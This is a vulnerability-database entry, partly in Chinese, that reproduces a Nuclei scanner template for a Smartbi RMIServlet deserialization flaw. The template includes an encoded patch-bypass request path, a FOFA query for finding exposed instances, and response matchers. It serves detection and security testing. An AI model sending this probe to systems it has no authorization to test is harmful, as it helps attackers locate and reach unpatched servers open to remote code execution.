smartbi-deserialization: Smartbi windowunloading Interface - Deserialization

日期: 2025-08-01 | 影响软件: Smartbi | POC: 已公开

漏洞描述

The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage.

PoC代码[已公开]

id: smartbi-deserialization

info:
  name: Smartbi windowunloading Interface - Deserialization
  author: SleepingBag945
  severity: high
  description: |
    The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage.
  reference:
    - https://stack.chaitin.com/techblog/detail?id=122
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="SMARTBI"
  tags: smartbi,deserialization

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        className=UserService&methodName=isLogged&params=[]

    payloads:
      path:
        - /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54
        - /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"H~CxOm~"'

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 490a00463044022039a7f072d8c61321d0c51fdb2f1658439fdf621e82ac29929943fa6c355aba9e02204ae2999567a06b49b837fefce5b3b199bd40cfc6ce9c3cdaf59dfa55c87a4a13:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/smartbi/smartbi-deserialization.yaml

相关漏洞推荐